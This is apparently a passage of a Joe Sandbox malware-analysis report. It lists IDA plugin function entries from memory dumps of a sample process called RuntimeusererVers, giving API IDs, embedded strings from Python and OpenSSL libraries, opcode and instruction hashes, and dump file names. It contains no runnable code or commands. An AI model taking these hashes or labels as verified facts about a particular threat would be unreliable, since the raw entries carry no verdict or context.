                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc70000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Module_$Err_ExceptionFromModuleObjectSpecTypeType_With
                                                                                                                                                                                                                                          • String ID: Empty$Exception raised by Queue.get(block=0)/get_nowait().$_queue.Empty
                                                                                                                                                                                                                                          • API String ID: 1138974572-1946099957
                                                                                                                                                                                                                                          • Opcode ID: b734e69cca9964b11ba62dbc2179316181713867e2c5af3e713d8057d29c683d
                                                                                                                                                                                                                                          • Instruction ID: 9689ed191ece0f5421340c633553bae6d7651d91c08ec40e2158170e9c1bc6fc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b734e69cca9964b11ba62dbc2179316181713867e2c5af3e713d8057d29c683d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28014027B19F8392EB158B25E8557652361AF4ABE4B44AB31C92F8E754FE2CE056C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Module_State$ClearDict_FormatItemUnicode_
                                                                                                                                                                                                                                          • String ID: Unsupported digestmod %R
                                                                                                                                                                                                                                          • API String ID: 3756705361-2483404930
                                                                                                                                                                                                                                          • Opcode ID: baa926e67fd8eb74a5850be4eb08325ac6c3e182677fdd4491857e46790330d9
                                                                                                                                                                                                                                          • Instruction ID: 01bcfd5ab16bdf1257b82490706565250f7fb2861b7f46cae7dccf2434ce46eb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: baa926e67fd8eb74a5850be4eb08325ac6c3e182677fdd4491857e46790330d9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7011E60B09E4781EE54DB56A848A796360AF49FF0F085274DD4E07764DE6CF8E48700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_O_ctrlO_freeO_newO_s_memO_set_flagsString
                                                                                                                                                                                                                                          • String ID: failed to allocate BIO
                                                                                                                                                                                                                                          • API String ID: 68942223-3472608418
                                                                                                                                                                                                                                          • Opcode ID: cb7d698332ddc7489fc073840a368666f37035e0e48c3e6d41ba510e4f809688
                                                                                                                                                                                                                                          • Instruction ID: 9bbf911f52284c7d643232c2ceea6e1a74548ed4f70b8bc62769965a2299f2f9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb7d698332ddc7489fc073840a368666f37035e0e48c3e6d41ba510e4f809688
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4014C61B18E0382FA149B22B95423963A1BF88BF6F955630C91E4AB64DF3CF4948340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_peek_error
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3623038435-0
                                                                                                                                                                                                                                          • Opcode ID: 0567de2ce4e0dd17345ebb43f0f769471d0af108d9aa9bfeb788f01831d6215d
                                                                                                                                                                                                                                          • Instruction ID: 591c6238822ed4e9c6d6036fa2543e1de24489333dc93d6aeed6b0f14d7e9ccb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0567de2ce4e0dd17345ebb43f0f769471d0af108d9aa9bfeb788f01831d6215d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB418E62E19A4682FF74961282957395391FFC57E0F081130EE4D87789EF1CFAD28B20
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$free$Delete$ConditionVariableWake$CloseEnterErrorHandleLastLeaveObjectSingleWait
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3339358538-0
                                                                                                                                                                                                                                          • Opcode ID: c8d3e582c8d75b4e91ef687b2f5f5f63dcd9bfdea239a6fc40db87f2861300ee
                                                                                                                                                                                                                                          • Instruction ID: 658f3c3dae324ac3a020b82a1beb4af0a74584fb593fc6e7d1c1b4e9d49fe062
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8d3e582c8d75b4e91ef687b2f5f5f63dcd9bfdea239a6fc40db87f2861300ee
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90513527A0AE8685EB559F65D4103B96360FF85BE4F084A31EF8F46759EF2CD4838710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _errno$Value$Err_LongLong_Occurredmalloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 262410431-0
                                                                                                                                                                                                                                          • Opcode ID: 6e6f04d62ab505afe3a0d4f9d8066ade11c0dec349c68b08317abe0ae38a6176
                                                                                                                                                                                                                                          • Instruction ID: 59ac3ea07a635d469b53ec61828e181085103e8fccebfdc6cd0641e2aefcf8ab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e6f04d62ab505afe3a0d4f9d8066ade11c0dec349c68b08317abe0ae38a6176
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09110A75A59F0283EA0D9B25ECA41B873A0BF88BA4F445634DA1E07360EF3DB5958710
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\extensions_clnt.c
                                                                                                                                                                                                                                          • API String ID: 0-592572767
                                                                                                                                                                                                                                          • Opcode ID: c927fe1bdb2ea0dc208643f5703eafe151e19c715c7a42174d702599c544fa67
                                                                                                                                                                                                                                          • Instruction ID: c774eaf2a2d2e550241edfb716918c8a6da138811f4befe31d0ac449052773ff
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c927fe1bdb2ea0dc208643f5703eafe151e19c715c7a42174d702599c544fa67
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7391A4B2A18B4585EB148B11E4046BA77A1FF85BE4F484235EA8D07B95DF3CF592CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_sk_num$L_sk_valueR_add_error_data
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_clnt.c$No ciphers enabled for max supported SSL/TLS version
                                                                                                                                                                                                                                          • API String ID: 2496138956-1190228026
                                                                                                                                                                                                                                          • Opcode ID: 50934ae1e0cd740cf3728aabbb00555bb7461172e3d8f9df214952323c0eb3ac
                                                                                                                                                                                                                                          • Instruction ID: f875dd3c384770e305c42e39465efbbb3706971f03df40c993bd91c3ed4ce9ae
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50934ae1e0cd740cf3728aabbb00555bb7461172e3d8f9df214952323c0eb3ac
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9618231B08A4686EF608A11E9007BA67A1FB84BE8F544275DE4E47B95DF3CF9C58700
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: read_raw_complex_data$read_raw_complex_data: bad complex size$read_raw_unsigned_data$read_raw_unsigned_data: bad integer size
                                                                                                                                                                                                                                          • API String ID: 0-1204700216
                                                                                                                                                                                                                                          • Opcode ID: 2a27670f38a129cb1f0f1301c1b22d20c8f13f1b2cdad81d2acc53eba693f87d
                                                                                                                                                                                                                                          • Instruction ID: 6f51b70b718ef35af5fad12c2fc86ac406cf4af307d682f8609880cdb481f9ba
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a27670f38a129cb1f0f1301c1b22d20c8f13f1b2cdad81d2acc53eba693f87d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6941D671D08D46C6EA66D739C8A11B82390FF967E4F608731EA4DD2560EF1DF896D600
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Y_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_srvr.c
                                                                                                                                                                                                                                          • API String ID: 1282063954-348624464
                                                                                                                                                                                                                                          • Opcode ID: 32a2037f69fb0e8ea2d16fc68d07f4a021f43c55029d368323f1534c015843c1
                                                                                                                                                                                                                                          • Instruction ID: 24539f5be6eb1da2fd76a7529b9dd06283809a0ab7786b80c01f159dbe9b3973
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32a2037f69fb0e8ea2d16fc68d07f4a021f43c55029d368323f1534c015843c1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D54180B2608B4286EB20CF51E540AAD77A4FB45BE4F444235EE4C07B95DF3CFA968700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_sk_num$L_sk_valueX509_i2d_
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_lib.c$2
                                                                                                                                                                                                                                          • API String ID: 3754435392-3488551833
                                                                                                                                                                                                                                          • Opcode ID: c50b85bc3bcbec496a441513fc36b76c6478cab3b6888f1826de5002a44e3c7a
                                                                                                                                                                                                                                          • Instruction ID: b3a572607b7dcd8ccf6560832830291edb0735b716ba9987a1aa6aa250ab1d78
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c50b85bc3bcbec496a441513fc36b76c6478cab3b6888f1826de5002a44e3c7a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7331A131B08B5285FE119B62A8406BE57D5BF94BE0F450630ED8C47B9AEE7CF5428B00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: J_obj2txt$FromMallocMem_SizeStringUnicode_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2822617359-0
                                                                                                                                                                                                                                          • Opcode ID: 3705a5b2c38d879c155ec53f363983424dc68502a77f10ae96ce75e6db962812
                                                                                                                                                                                                                                          • Instruction ID: 67158a9ba5c0650cfbb855f1e4e4055cd7b11c73135c70359127941059d8c373
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3705a5b2c38d879c155ec53f363983424dc68502a77f10ae96ce75e6db962812
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E731E7A1B1CE4286FB218B22A8503BA52A4BF89BF2F845730DD1E47755DF3CF5858700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_ctrlO_freeX_new
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\s3_enc.c
                                                                                                                                                                                                                                          • API String ID: 22238829-1839494539
                                                                                                                                                                                                                                          • Opcode ID: 4cf59fbcf39c19b4635e50e9352caef68878f1dbfee15a521ec02f95a7f032fb
                                                                                                                                                                                                                                          • Instruction ID: c90995414a6dfb1bfed842de3ba4a41f49d83b3e6129bc6c8eab6ef5d20f9f4c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cf59fbcf39c19b4635e50e9352caef68878f1dbfee15a521ec02f95a7f032fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F419232B08E9185EB90CF15E4407AE63A0FB88BE4F184631EE4C4B795EF3DE5868700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_sk_num$L_sk_pop_freeL_sk_valueR_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_cert.c
                                                                                                                                                                                                                                          • API String ID: 732311666-349359282
                                                                                                                                                                                                                                          • Opcode ID: ab10a35f01cc659bf1d8b89c5a6f0d2dffd631ccd2e4279cb355084bd3584024
                                                                                                                                                                                                                                          • Instruction ID: 07c37173db3703fa1b993d384177c824ced349eadf8ffa364ca2711c3478467e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab10a35f01cc659bf1d8b89c5a6f0d2dffd631ccd2e4279cb355084bd3584024
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D216271B08E8185EF549F26A9406B95790FF847F0F140635EE4D47BA6DF3CE4928700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
